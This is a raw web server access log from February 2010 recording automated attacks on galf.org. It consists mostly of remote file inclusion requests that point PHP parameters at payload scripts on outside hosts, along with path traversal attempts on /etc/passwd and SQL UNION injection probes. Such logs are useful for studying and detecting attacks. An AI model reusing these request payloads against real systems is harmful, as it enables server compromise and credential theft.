69.64.70.246 - - [28/Feb/2010:17:29:33 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:29:35 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [28/Feb/2010:17:32:20 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [28/Feb/2010:17:32:20 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [28/Feb/2010:17:32:20 -0800] "GET /logs/access_090928.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:17:38:41 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:17:39:04 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:17:39:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:17:39:37 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [28/Feb/2010:17:39:41 -0800] "GET /logs/access.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [28/Feb/2010:17:40:55 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:42:04 -0800] "GET /logs/access_100104.log/errors.php?error=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:42:04 -0800] "GET /errors.php?error=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:42:04 -0800] "GET /logs/errors.php?error=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [28/Feb/2010:17:42:12 -0800] "GET /logs/access_091221.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [28/Feb/2010:17:43:13 -0800] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:17:44:07 -0800] "GET /index.php?inc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:17:44:07 -0800] "GET /index.php?inc=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:44:16 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:44:16 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:44:17 -0800] "GET /logs/access_091228.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:44:17 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:44:43 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:17:44:54 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:17:47:03 -0800] "GET /logs//index.php?cmd&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:17:47:03 -0800] "GET /logs/access_100118.log%20%20//index.php?cmd&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.115.150 - - [28/Feb/2010:17:47:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:48:39 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:48:39 -0800] "GET /logs/access_091228.log//components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:48:39 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:17:49:49 -0800] "GET /logs/access_100111.log//components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:49:52 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:55:12 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:17:55:12 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:17:55:45 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.24.174.51 - - [28/Feb/2010:17:59:06 -0800] "GET /logs/access_091116.log%20/index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:17:59:06 -0800] "GET /index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:17:59:10 -0800] "GET /logs/index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
77.225.42.178 - - [28/Feb/2010:17:59:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.225.42.178 - - [28/Feb/2010:17:59:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:59:50 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:17:59:53 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:17:59:55 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "galf.org"
77.225.42.178 - - [28/Feb/2010:18:00:26 -0800] "GET /logs/access_090921.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
200.201.180.130 - - [28/Feb/2010:18:01:16 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.23.119.17 - - [28/Feb/2010:18:01:17 -0800] "GET /index.php?option=com_yanc&Itemid=75&listid=-2+UNION HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
193.23.119.17 - - [28/Feb/2010:18:01:17 -0800] "GET /logs//index.php?option=com_yanc&Itemid=75&listid=-2+UNION HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
193.23.119.17 - - [28/Feb/2010:18:01:20 -0800] "GET /logs//index.php?option=com_yanc&Itemid=75&listid=-2+UNION HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
193.23.119.17 - - [28/Feb/2010:18:01:20 -0800] "GET /index.php?option=com_yanc&Itemid=75&listid=-2+UNION HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:02:30 -0800] "GET /logs/access_100222.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:02:30 -0800] "GET /?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:02:30 -0800] "GET /logs//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:02:33 -0800] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:02:33 -0800] "GET /?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:02:33 -0800] "GET /logs//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:03:38 -0800] "GET /logs/access_100222.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:03:38 -0800] "GET /?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:03:38 -0800] "GET /logs//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:03:39 -0800] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:03:39 -0800] "GET /?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:03:39 -0800] "GET /logs//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
202.153.127.155 - - [28/Feb/2010:18:03:51 -0800] "GET /logs//errors.php?error=http://h1.ripway.com/anakbugis/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:18:05:32 -0800] "GET /logs/access_100208.log%20/index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:18:05:34 -0800] "GET /logs/access_100208.log%20/index.php?nic=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:06:23 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:06:24 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:06:28 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.0" 200 4791 "-" "Mozilla/5.0" "galf.org"
121.254.172.27 - - [28/Feb/2010:18:06:30 -0800] "GET /logs/access.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:06:30 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:06:30 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:06:34 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:06:35 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:06:35 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:07 -0800] "GET /logs/access_091130.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:08 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:08 -0800] "GET /logs/access_091214.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.120.145.13 - - [28/Feb/2010:18:07:24 -0800] "GET /errors.php?error=http://h1.ripway.com/anakbugis/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
59.120.145.13 - - [28/Feb/2010:18:07:27 -0800] "GET /logs//errors.php?error=http://h1.ripway.com/anakbugis/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:52 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:57 -0800] "GET /logs/access_100222.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:57 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:57 -0800] "GET /logs/access_090928.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:07:57 -0800] "GET /logs/access_091123.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:08:09 -0800] "GET /logs/access_090831.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:08:09 -0800] "GET /logs/access_090817.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:08:09 -0800] "GET /logs/access_091026.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:08:10 -0800] "GET /logs/access_100118.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:08:22 -0800] "GET /logs/access_091102.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:08:28 -0800] "GET /logs/access_090921.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.97.64.32 - - [28/Feb/2010:18:08:52 -0800] "GET /errors.php?error=http://h1.ripway.com/anakbugis/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
80.97.64.32 - - [28/Feb/2010:18:08:57 -0800] "GET /logs//errors.php?error=http://h1.ripway.com/anakbugis/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:18:09:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:18:09:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:18:09:26 -0800] "GET /logs/access_100111.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:18:09:42 -0800] "GET /logs/access_100104.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:18:09:57 -0800] "GET /logs/access_100118.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:18:10:44 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:18:10:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:18:10:44 -0800] "GET /logs/access_090713.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:18:11:09 -0800] "GET /logs/access_100111.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:18:11:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:18:11:28 -0800] "GET /logs/access_090713.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:18:11:28 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:18:11:45 -0800] "GET /logs/access_100111.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:18:13:01 -0800] "GET /logs//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:18:13:01 -0800] "GET /main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:18:13:05 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:18:13:56 -0800] "GET /logs/access_091207.log%20%20//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.225.42.178 - - [28/Feb/2010:18:15:04 -0800] "GET /logs/access_091214.log%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:15:40 -0800] "GET /logs/access_090831.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:15:40 -0800] "GET /logs/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:15:40 -0800] "GET /index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:16:50 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:16:50 -0800] "GET /logs/access_100222.log//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:17:40 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:17:40 -0800] "GET /logs/access_100222.log//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:18:22 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:18:22 -0800] "GET /?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:18:22 -0800] "GET /logs/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 200 4783 "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:18:53 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:19:07 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:20:19 -0800] "GET /logs/access_090921.log%20%20/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:20:23 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:20:26 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
